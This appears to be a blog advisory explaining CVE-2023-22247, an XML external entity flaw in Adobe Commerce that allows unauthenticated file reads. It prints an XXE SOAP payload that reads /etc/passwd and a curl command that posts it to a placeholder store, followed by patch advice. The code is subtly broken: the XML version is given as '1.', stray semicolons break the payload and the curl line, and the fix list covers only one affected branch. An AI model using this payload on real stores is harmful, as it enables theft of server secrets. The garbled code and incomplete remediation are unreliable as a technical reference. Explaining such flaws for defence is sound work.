CVE-2023-22247 - XML Injection in Adobe Commerce Leads to Arbitrary File System Read (Explained)

CVE-2023-22247 is a serious security vulnerability discovered in Adobe Commerce, previously known as Magento. This flaw affects versions 2.4.4-p2 (and earlier) and 2.4.5-p1 (and earlier). The vulnerability allows an unauthenticated attacker (someone with no log-in or account) to read files from the server’s file system—meaning, in simple terms, an attacker can steal sensitive files simply by sending the right network request. Worse, it doesn’t require any action from a legitimate user.

Let’s break down how this works, the risk, how attackers exploit it, and what you can do to stay safe.

The Heart of the Problem: XML Injection

This vulnerability is an XML Injection. In the backend, Adobe Commerce (Magento) uses XML for processing certain requests. But due to improper input validation, it’s possible for an attacker to inject malicious XML content.

By tampering with the XML, attackers can trigger the application to fetch and return files from the server’s file system, a classic example of a local file inclusion (LFI) via XXE (XML External Entity) injection.

How Does the Exploit Work?

When Adobe Commerce receives XML input (for example, through the web API or SOAP requests), it doesn’t properly filter out dangerous use of <!DOCTYPE and ENTITY declarations. This lets an attacker read files like /etc/passwd, environment configs, private keys, or even database backups—whatever the web server user can read.

Here’s an example of a classic XXE attack payload, adapted for this vulnerability

<?xml version="1." encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">;
  <soap:Body>
    <SomeRequest>
      <SomeParameter>&xxe;</SomeParameter>
    </SomeRequest>
  </soap:Body>
</soap:Envelope>

- This request tries to read the /etc/passwd file (common in Unix/Linux) and injects its contents into the response.

Below, we show how an attacker might send this request using curl

curl -k -X POST "https://vulnerable-store.com/soap/default?services=SomeService"; \
  -H "Content-Type: text/xml" \
  --data-binary @malicious_payload.xml

Where malicious_payload.xml contains the XML shown above.

If successful, the server replies with the contents of /etc/passwd embedded in the response.

Adobe Security Bulletin:

APSB23-25 Security update available for Adobe Commerce | Adobe PSIRT

NIST NVD Entry:

CVE-2023-22247 Detail | NIST
- Magento Official Patch/Upgrade Advice:

 Release notes for security updates | Adobe Commerce

How to Fix CVE-2023-22247

The fix is to update! Adobe issued patches for all supported affected versions.

For 2.4.5-p1: update to 2.4.5-p2 or higher

Check the official documentation and apply the patches as soon as possible. If you run an unsupported version, upgrade immediately.

Takeaways

- CVE-2023-22247 is a critical XML injection in Adobe Commerce/Magento

Patch your store as soon as possible

Don't wait until it's too late! Exploit code is trivial and attackers are already scanning for this flaw.

Timeline

Published on: 03/27/2023 21:15:00 UTC
Last modified on: 04/04/2023 20:51:00 UTC